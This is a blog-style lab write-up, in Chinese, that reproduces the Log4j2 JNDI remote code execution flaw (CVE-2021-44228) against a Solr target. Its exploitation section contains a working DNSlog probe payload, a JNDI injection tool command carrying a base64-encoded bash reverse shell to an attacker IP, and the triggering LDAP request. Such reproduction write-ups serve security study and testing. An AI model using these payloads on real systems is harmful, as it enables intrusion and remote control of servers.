log4j2远程代码执行漏洞(CVE-2021-44228)

已于 2024-05-23 00:47:30 修改
阅读量243 收藏 2
点赞数 9
分类专栏: CVE复现 文章标签: log4j web安全 安全 windows 网络安全
于 2024-05-22 23:04:36 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/W13680336969/article/details/139075975
版权

漏洞复现环境搭建请参考

http://t.csdnimg.cn/E5jTe

漏洞版本

Apache Log4j 2.0-2.14.1

Apache Log4j 1.2和Log4j 1.2.x系列不受影响

Apache Log4j 2.15.0及以上版本已修复此漏洞

漏洞验证

(1)访问web站点

(2)发现log4j2日志功能点

(3)利用DNS的回显验证log4j漏洞的存在,在DNSlog申请一个临时域名

http://www.dnslog.cn/

(4)寻找可以进行命令执行的传参点

官方复现路径为:http://192.168.88.128:8983/solr/admin/cores?action=
官方文件参考:http://www.ctfiot.com/16640.html#fancybox-14

(4)利用payload进行测试(这里需要把路径中的#去掉)

#${jndi:ldap://${sys:java.version}.(申请出来的域名)}
${jndi:ldap://${sys:java.version}.0k7kuc.dnslog.cn}

(5)DNS解析成功回显java的版本信息,成功验证存在log4j2漏洞

漏洞利用

(1)安装 JNDI 注入工具

git clone https://github.com/bkfish/Apache-Log4j-Learning.git

(2)将反弹shell命令进行base64编码

(3)进入Apache-Log4j-Learning/tools下执行命令

#java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,[经过base64编码后的命令]}|{base64,-d}|bash" -A 攻击机IP
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEyOC84ODg4IDA+JjEn}|{base64,-d}|bash" -A 192.168.88.128

(4)选择远程服务,该靶机只支持ldap,rmi无法弹shell

(5)攻击机开启监听

(6)浏览器进行访问远程服务

http://192.168.88.128:8983/solr/admin/cores?action=${jndi:ldap://192.168.88.128:1389/kdhmjd}

(7)成功反弹shell

Yeah_0day
关注
  • 9
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
Log4j2远程代码执行漏洞复现(cve-2021-44228)
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4jApache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
Apache Log4j 远程代码执行漏洞(CVE-2021-44832)
10-25
Java 6 将 log4j 升级到 2.3.2 版本,Java 7 将 log4j 升级到 2.12.4 版本,Java 8 或更高版本将 log4j 升级到 2.17.1 版本
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 4821
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
Apache Druid远程代码执行漏洞复现(CVE-2021-25646)
A_dmin的博客
03-01 2297
Apache Druid远程代码执行漏洞复现(CVE-2021-25646) 漏洞描述 Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。攻击者可直接构造恶意请求执行任意代码,控制服务器。 影响版本 Apache Druid < 0.20.1 漏洞环境以及复现 fofa搜索:title=“
CVE-2021-44228 Log4j2 远程代码执行漏洞
震山的博客
08-23 686
简单分析,扯不上深度,还望大佬指正
log4j2 CVE-2021-44228 远程代码执行漏洞
读书 买花 长大
05-17 387
CVE-2021-44228
漏洞复现】2.Apache Log4j2远程代码执行漏洞(CVE-2021-44228)复现及分析
Zichel77的博客
03-21 1244
Apache 是当今世界上非常流行的跨平台Web服务端,有着良好的扩充性。而Log4j则是Apache的开源组件,用于日志管理,功能强大。Log4j来源于 Apache 软件基金会的日志服务项目,是一种Java日志框架,从最初Log4j1发展到现在的Log4j2,已经广泛应用于各行各业的业务开发。2021年11月24日,阿里云安全团队向Apache官方报告了Apache Log4j2远程代码执行漏洞
log4j远程代码执行(CVE-2021-44228)
2301_77392802的博客
03-26 806
Apache Log4j是一款非常受欢迎的Java日志记录框架,广泛应用于企业级应用和各种互联网产品中。然而,近期公开的CVE-2021-44228漏洞给这个稳定的框架带来了严重威胁。这个漏洞允许攻击者在受影响的系统上执行任意代码,可能导致敏感数据泄露、系统被完全控制等严重后果。该漏洞的产生主要源于Log4j的某些功能在处理特定输入时存在安全缺陷。攻击者可以通过精心构造的输入,利用Java的反射机制,触发特定条件下的代码执行
springboot如何修复log4j2远程代码执行漏洞CVE-2021-44228(一行代码解决)
城北荆无命的博客
12-15 970
log4j2漏洞被爆出来这两天忙着修复负责的各系统的漏洞,一般maven的非springboot项目直接升级版本即可、但是springboot项目中就算你使用的是logback来输出日志,仍然会存在漏洞的可能,log4j-api这个包是在spring-boot-starter-logging中,只要你使用的是2.0版本以上的springboot就会有此漏洞。 废话少说了直接上代码, 版本一: 既然log4j的相关依赖在spring-boot-starter-logging中那么直接用进行排除然后引入高本.
log4j2远程代码执行漏洞复现(CVE-2021-44228
Wshchf的博客
06-04 599
Apache log4j2—RCE 漏洞是由于Log4j2 提供的lookup功能下的jndi Lookup模块出现问题所导致的,该功能模块在输出日志信息时允许开发人员通过相应的协议去请求远程主机上的资源。而开发人员在处理数据时,并没有对用户输入的数据进行判断,导致Log4j2 请求远程主机上含有恶意代码的资源并执行其中的代码,从而造成远程代码执行漏洞log4j2框架下的lookup查询服务提供了{}字段解析功能,传进去的值会被直接解析。例如${java:version}会被替换为对应的java版本。
Apache Log4j 2 ​远程代码执行漏洞 ( CVE-2021-44228 )​
itisauto2008的专栏
12-14 2040
Microsoft 继续分析2021 年 12 月 9 日披露的与 Apache Log4j(许多基于 Java 的应用程序中使用的日志记录工具)相关的远程代码执行漏洞( CVE-2021-44228 )​。该漏洞是一种远程代码执行漏洞,可以让未经身份验证的攻击者获得对目标系统的完全访问权限。当易受攻击的 Log4j 2 组件解析和处理特制字符串时,可以触发它。这可能通过任何用户提供的输入发生。 该漏洞编号为CVE-2021-44228,称为“Log4Shell”,影响使用 Log4j 2 版本 2.0.
CVE-2023-40477 WinRAR 远程代码执行漏洞 PoC
09-02
尽管其 CVE 等级很高,但成功利用所需的复杂性表明广泛滥用的可能性很低,这与广泛利用的 Log4j RCE 漏洞不同。  有趣的是,Chromium似乎也利用了unrar库:...
log4j-core-2.15.1.jar
12-11
Apache Log4j2 远程代码执行漏洞CVE-2021-44228)2.15.1版本
CVE-2019-17571:Apache Log4j 1.2.X存在反序列化远程代码执行漏洞
04-24
CVE-2019-17571/Apache Log4j 1.2.X存在反序列化远程代码执行漏洞 漏洞预警参考链接: 1. 漏洞描述 Apache Log4j是美国阿帕奇(Apache)软件基金会的一款基于Java的开源日志记录工具.Apache Log4j 1.2.X系列版本中...
【Arthas案例】某应用依赖两个GAV不同但包含两个相同全限定类名StaticLoggerBinder,引起log4j.Level类找不到异常
最新发布
简放视野的专栏
06-15 617
【3分钟内解决问题】 两个不同的GAV依赖冲突,包含相同全限定类名,引起ClassNotFoundException 【案例1】某应用依赖两个GAV不同的jar,但包含两个相同全限定类名StaticLoggerBinder,引起log4j.Level类找不到异常 1.完整的异常调用栈【从案发现场找线索】 2.关键的异常日志 3.案发现场的源代码 4.解决方法
网络安全(补充)
m0_62207482的博客
06-11 899
上下文因素主要有事务、设备和网络模式。例如一些网站的访问根据地址位置信息来判断来访者的身份,以确认是否授权访问 Kerberos系统涉及四个基本实体:1Kerberos客户机(用户用来访问服务器设备)、2AS(认证服务器,识别用户身份并提供TGS会话密钥)、3(TGS票据发放服务器、未申请服务的用户授予票据)、4(应用服务器,为用户提供服务的设备或系统) 一般来说,PKI涉及多个实体之间的协商和操作,主要实体包括CA、RA、终端实体、客户端、目录服务器 身份认证网关产品的技术特点是利用数字证书、根据同
打破安全设备孤岛,多源威胁检测与响应(XDR)如何构建一体化安全防线
安胜ANSCEN的博客
06-14 655
在企业常态化安全运营中,星盾多源威胁检测与响应(XDR)平台可灵活伸缩部署,融汇多源数据与能力,为安全运营团队提供统一的网络资产画像、自动化的威胁检测与响应、全面的安全态势、灵活可定义的指挥调度规范,助力企业建立高效的网络安全防御与响应体系。在网络安全防御体系的构建中,尽管部署了防火墙、入侵检测系统(IDS/IPS)、加密设备、网络流量分析工具等多种安全防御产品和措施,若这些产品之间无法进行有效的联动与协作机制,不仅降低了整体防护效果,还增加了管理的复杂性和成本。
目标可能存在Apache Log4j2 远程代码执行漏洞(CVE-2021-44228)怎么修复
07-13
对于 Apache Log4j2 远程代码执行漏洞CVE-2021-44228),修复步骤如下: 1. 首先,确认你的应用程序是否使用了 Apache Log4j2。如果使用了,需要升级到修复了漏洞的版本。你可以查看 Apache Log4j2 的官方网站...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值